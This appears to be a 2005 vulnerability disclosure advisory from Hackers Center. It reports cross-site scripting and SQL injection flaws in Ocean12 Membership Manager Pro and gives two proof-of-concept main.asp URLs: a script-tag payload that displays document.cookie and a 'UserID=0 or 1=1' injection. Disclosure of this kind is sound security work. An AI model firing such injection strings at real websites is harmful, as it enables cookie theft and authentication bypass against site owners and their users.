|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Friday, 08 April 2005 11:34 |
 Hackers Center Security Group (http://www.hackerscenter.com/)
Zinho"s Security Advisory
Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High
Date: 5/04/2005
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner
to easily add password protected areas to their website"
xss
main.asp?
UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s
cript%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
SQL INJECTION
main.asp?
UserID=0 or
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10
The vendor has been contacted more than a month ago. No response
received.
Author:
Zinho is webmaster and founder of http://www.hackerscenter.com ,
Security research portal
Secure Web Hosting Companies Reviewed:
http://www.securityforge.com/web-hosting/secure-web-hosting.asp
zinho-no-spam @ hackerscenter.com
|
